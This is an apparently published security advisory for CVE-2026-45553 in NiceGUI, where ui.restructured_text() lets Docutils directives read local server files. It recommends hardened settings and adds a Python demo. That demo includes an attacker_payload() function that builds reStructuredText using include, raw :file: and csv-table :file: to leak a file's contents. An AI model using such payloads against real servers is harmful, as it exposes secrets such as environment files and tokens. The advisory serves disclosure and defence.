PT-2026-41235 · Nicegui · Nicegui

Dennyabrahamsinaga

+1

·

Published

2026-05-14

·

Updated

2026-06-02

·

CVE-2026-45553

CVSS v3.1

7.5

High

Vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions: NiceGUI (affected versions not specified)
Description: The ui.restructured_text() function renders reStructuredText server-side with Docutils without disabling Docutils' file insertion directives. When attacker-controlled content reaches this function, the attacker can use standard Docutils directives such as include, csv-table with :file:, or raw with :file: to read any local file the server process can read, and the file contents are returned in the rendered HTML. The rendering happens in prepare_content() in nicegui/elements/restructured_text.py, which does not disable file insertion or raw directives for the render. The result is disclosure of sensitive information such as environment files, database URLs, API tokens, and application source; the CVSS vector reflects that only confidentiality is affected (C:H, I:N, A:N) and that no authentication or user interaction is required.
Recommendations: Disable the unsafe Docutils features in prepare_content() by passing file_insertion_enabled=False, raw_enabled=False and _disable_config=True in the settings_overrides parameter. Setting file_insertion_enabled to False also covers the :url: variants of csv-table and raw, which would otherwise let the same input make the server fetch remote resources; _disable_config stops a docutils.conf on the server from switching the directives back on. As a temporary workaround, do not pass untrusted or user-controlled input to ui.restructured_text().
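The pattern the description and recommendation lay out, as an added example rather than NiceGUI's own code: a renderer that hands attacker-controlled reStructuredText to docutils.core.publish_parts with no overrides (a hypothetical stand-in for prepare_content(), reconstructed from the advisory text, not copied from the project), the same renderer with the recommended settings_overrides, and a constructed payload that tries include, raw :file: and csv-table :file: against a throwaway file. It needs docutils installed; HARDENED_SETTINGS, leak_check(), the payload and the fake DATABASE_URL are this example's inventions.

```python
"""Docutils file-insertion abuse and the mitigation from the recommendation.

Added example, not code from NiceGUI or from this advisory. It assumes only
the pattern the advisory describes: attacker-controlled reStructuredText goes
to docutils.core.publish_parts with no settings_overrides. Needs docutils.
"""
import os
import tempfile
from typing import Optional

# Overrides named in the recommendation. file_insertion_enabled=False turns
# off include plus the :file:/:url: options of csv-table and raw,
# raw_enabled=False removes raw passthrough entirely, and _disable_config
# stops a docutils.conf in the working directory from re-enabling either.
HARDENED_SETTINGS = {
    'file_insertion_enabled': False,
    'raw_enabled': False,
    '_disable_config': True,
}


def _render(content: str, overrides: Optional[dict]) -> str:
    # Imported here so the module loads (and the payload helper works)
    # even where docutils is not installed.
    from docutils.core import publish_parts
    parts = publish_parts(content, writer_name='html5',
                          settings_overrides=overrides)
    return parts.get('html_body', '')


def render_vulnerable(content: str) -> str:
    """Docutils defaults: every file-reading directive is live. This stands in
    for a prepare_content() that passes no overrides (hypothetical)."""
    return _render(content, None)


def render_hardened(content: str) -> str:
    """Same render with the unsafe features switched off."""
    return _render(content, dict(HARDENED_SETTINGS))


def attacker_payload(target: str) -> str:
    """RST an attacker would submit to pull `target` into the page through the
    three directives the advisory lists (constructed sample input)."""
    return '\n'.join([
        'Release notes',
        '=============',
        '',
        f'.. include:: {target}',
        '   :literal:',
        '',
        '.. raw:: html',
        f'   :file: {target}',
        '',
        '.. csv-table:: changelog',
        f'   :file: {target}',
        '',
    ])


def leak_check() -> dict:
    """Write a throwaway .env, render the payload both ways and report whether
    its secret reaches the HTML: {'vulnerable': True, 'hardened': False}."""
    secret = 'DATABASE_URL=postgres://app:hunter2@db.internal/app'  # constructed
    fd, path = tempfile.mkstemp(suffix='.env')
    try:
        with os.fdopen(fd, 'w') as fh:
            fh.write(secret + '\n')
        payload = attacker_payload(path)
        return {
            'vulnerable': 'hunter2' in render_vulnerable(payload),
            'hardened': 'hunter2' in render_hardened(payload),
        }
    finally:
        os.unlink(path)


if __name__ == '__main__':
    print(leak_check())
```

With docutils present the script prints `{'vulnerable': True, 'hardened': False}`. In the hardened render each directive becomes a Docutils warning that quotes the directive text, and at the default report_level those warnings are also emitted into the HTML, so the attacker's own input is echoed back but no file contents are; raise report_level in the same settings_overrides if parser messages should not be shown to users.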

Fix

Information Disclosure

Weakness Enumeration

Related Identifiers

CVE-2026-45553
GHSA-JFRM-RX66-G536

Affected Products

Nicegui